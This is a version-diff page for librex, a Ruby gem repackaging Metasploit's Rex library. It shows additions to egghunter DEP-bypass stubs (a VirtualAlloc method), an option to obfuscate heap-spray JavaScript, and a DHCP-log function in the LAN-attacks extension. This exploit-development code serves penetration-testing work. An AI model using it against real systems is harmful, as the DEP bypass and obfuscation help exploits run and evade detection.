librex 0.0.50 → 0.0.51
Sign up to get free protection for your applications and to get access to all the features.
data/README.markdown
CHANGED
@@ -3,7 +3,7 @@
|
|
3
3
|
A non-official re-packaging of the Rex library as a gem for easy of usage of the Metasploit REX framework in a non Metasploit application. I received permission from HDM to create this package.
|
4
4
|
|
5
5
|
Currently based on:
|
6
|
-
SVN Revision:
|
6
|
+
SVN Revision: 13694
|
7
7
|
|
8
8
|
# Credits
|
9
9
|
The Metasploit development team <http://www.metasploit.com>
|
@@ -58,29 +58,34 @@ class Egghunter
|
|
58
58
|
end
|
59
59
|
startstub << "\n\t" if startstub.length > 0
|
60
60
|
|
61
|
-
getpointer
|
62
|
-
getsize
|
63
|
-
|
64
|
-
|
61
|
+
getpointer = ''
|
62
|
+
getsize = ''
|
63
|
+
getalloctype = ''
|
64
|
+
getpc = ''
|
65
|
+
jmppayload = "jmp edi"
|
65
66
|
|
66
|
-
apireg =
|
67
|
+
apireg = opts[:depreg] || 'esi'
|
67
68
|
apidest = opts[:depdest]
|
68
69
|
depsize = opts[:depsize]
|
69
|
-
|
70
|
+
|
70
71
|
freeregs = [ "esi", "ebp", "ecx", "ebx" ]
|
71
|
-
|
72
|
+
|
72
73
|
reginfo = {
|
73
74
|
"ebx"=>["bx","bl","bh"],
|
74
75
|
"ecx"=>["cx","cl","ch"]
|
75
76
|
}
|
76
77
|
|
77
78
|
if opts[:depmethod]
|
78
|
-
|
79
|
+
|
79
80
|
if freeregs.index(apireg) == nil
|
80
81
|
getpointer << "mov #{freeregs[0]},#{apireg}\n\t"
|
81
82
|
apireg = freeregs[0]
|
82
83
|
end
|
83
84
|
freeregs.delete(apireg)
|
85
|
+
|
86
|
+
if opts[:depmethod].downcase == "virtualalloc"
|
87
|
+
depsize = 0xfff
|
88
|
+
end
|
84
89
|
|
85
90
|
if opts[:depmethod].downcase == "copy" || opts[:depmethod].downcase == "copy_size"
|
86
91
|
if apidest
|
@@ -94,7 +99,7 @@ class Egghunter
|
|
94
99
|
end
|
95
100
|
freeregs.delete(apidest)
|
96
101
|
end
|
97
|
-
|
102
|
+
|
98
103
|
|
99
104
|
sizereg = freeregs[0]
|
100
105
|
|
@@ -123,13 +128,11 @@ class Egghunter
|
|
123
128
|
elsif high != "00"
|
124
129
|
getsize << "mov #{regvars[2]},0x%s\n\t" % high
|
125
130
|
end
|
126
|
-
getsize << "push #{sizereg}\n\t"
|
127
131
|
end
|
128
132
|
if sizereg == "ebp"
|
129
133
|
if low != "00" and high != "00"
|
130
134
|
getsize << "xor #{sizereg},#{sizereg}\n\t"
|
131
135
|
getsize << "mov bp,0x%s\n\t" % sizebytes
|
132
|
-
getsize << "push #{sizereg}\n\t"
|
133
136
|
end
|
134
137
|
end
|
135
138
|
# last resort
|
@@ -153,16 +156,27 @@ class Egghunter
|
|
153
156
|
if delta > 0
|
154
157
|
getsize << "add #{sizereg},0x%02x\n\t" % delta
|
155
158
|
end
|
156
|
-
getsize << "push #{sizereg}\n\t"
|
157
159
|
end
|
160
|
+
if opts[:depmethod].downcase == "virtualalloc"
|
161
|
+
getsize << "inc #{sizereg}\n\t"
|
162
|
+
end
|
163
|
+
|
164
|
+
getsize << "push #{sizereg}\n\t"
|
165
|
+
|
158
166
|
end
|
159
|
-
|
167
|
+
|
168
|
+
getalloctype = getsize
|
160
169
|
|
161
170
|
case opts[:depmethod].downcase
|
162
171
|
when "virtualprotect"
|
163
172
|
jmppayload = "push esp\n\tpush 0x40\n\t"
|
164
173
|
jmppayload << getsize
|
165
174
|
jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
|
175
|
+
when "virtualalloc"
|
176
|
+
jmppayload = "push 0x40\n\t"
|
177
|
+
jmppayload << getalloctype
|
178
|
+
jmppayload << "push 0x01\n\t"
|
179
|
+
jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
|
166
180
|
when "copy"
|
167
181
|
jmppayload = getpc
|
168
182
|
jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
|
@@ -1,5 +1,6 @@
|
|
1
1
|
require 'rex/text'
|
2
2
|
require 'rex/exploitation/obfuscatejs'
|
3
|
+
require 'rex/exploitation/jsobfu'
|
3
4
|
|
4
5
|
module Rex
|
5
6
|
module Exploitation
|
@@ -43,7 +44,7 @@ class HeapLib
|
|
43
44
|
"debug",
|
44
45
|
],
|
45
46
|
"Classes" =>
|
46
|
-
[
|
47
|
+
[
|
47
48
|
{ 'Namespace' => "heapLib", 'Class' => "ie" }
|
48
49
|
],
|
49
50
|
"Namespaces" =>
|
@@ -55,8 +56,8 @@ class HeapLib
|
|
55
56
|
#
|
56
57
|
# Initializes the heap library javascript
|
57
58
|
#
|
58
|
-
def initialize(custom_js = '')
|
59
|
-
load_js(custom_js)
|
59
|
+
def initialize(custom_js = '', opts = {})
|
60
|
+
load_js(custom_js, opts)
|
60
61
|
end
|
61
62
|
|
62
63
|
#
|
@@ -71,23 +72,32 @@ protected
|
|
71
72
|
#
|
72
73
|
# Loads the raw javascript from the source file and strips out comments
|
73
74
|
#
|
74
|
-
def load_js(custom_js)
|
75
|
-
|
75
|
+
def load_js(custom_js, opts = {})
|
76
|
+
|
76
77
|
# Grab the complete javascript
|
77
|
-
File.open(JavascriptFile)
|
78
|
+
File.open(JavascriptFile) do |f|
|
78
79
|
@js = f.read
|
79
|
-
|
80
|
-
|
80
|
+
end
|
81
|
+
|
81
82
|
# Decode the text
|
82
83
|
@js = Rex::Text.decode_base64(@js)
|
83
|
-
|
84
|
+
|
84
85
|
# Append the real code
|
85
86
|
@js += "\n" + custom_js
|
86
|
-
|
87
|
-
|
87
|
+
|
88
|
+
if opts[:newobfu]
|
89
|
+
# Obfuscate the javascript using the new lexer method
|
90
|
+
@js = JSObfu.new(@js)
|
91
|
+
return @js.obfuscate
|
92
|
+
elsif opts[:noobfu]
|
93
|
+
# Do not obfuscate, let the exploit do the work (useful to avoid double obfuscation)
|
94
|
+
return @js
|
95
|
+
end
|
96
|
+
|
97
|
+
# Default to the old method
|
98
|
+
# Obfuscate the javascript using the old method
|
88
99
|
@js = ObfuscateJS.obfuscate(@js, 'Symbols' => SymbolNames)
|
89
100
|
end
|
90
|
-
|
91
101
|
end
|
92
102
|
|
93
103
|
end
|
@@ -57,6 +57,20 @@ class Lanattacks < Extension
|
|
57
57
|
true
|
58
58
|
end
|
59
59
|
|
60
|
+
def dhcp_log
|
61
|
+
response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
|
62
|
+
entries = []
|
63
|
+
if( response.result == 0 )
|
64
|
+
log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
|
65
|
+
while log.length > 0
|
66
|
+
mac = log.slice!(0..5)
|
67
|
+
ip = log.slice!(0..3)
|
68
|
+
entries << [ mac, ip ]
|
69
|
+
end
|
70
|
+
end
|
71
|
+
entries
|
72
|
+
end
|
73
|
+
|
60
74
|
def start_tftp
|
61
75
|
client.send_request(Packet.create_request('lanattacks_start_tftp'))
|
62
76
|
true
|
metadata
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: librex
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.0.
|
4
|
+
version: 0.0.51
|
5
5
|
prerelease:
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
@@ -10,10 +10,10 @@ authors:
|
|
10
10
|
autorequire:
|
11
11
|
bindir: bin
|
12
12
|
cert_chain: []
|
13
|
-
date: 2011-
|
13
|
+
date: 2011-09-05 00:00:00.000000000Z
|
14
14
|
dependencies: []
|
15
15
|
description: Rex provides a variety of classes useful for security testing and exploit
|
16
|
-
development. Based on SVN Revision
|
16
|
+
development. Based on SVN Revision 13694
|
17
17
|
email:
|
18
18
|
- hdm@metasploit.com
|
19
19
|
- jacob.hammack@hammackj.com
|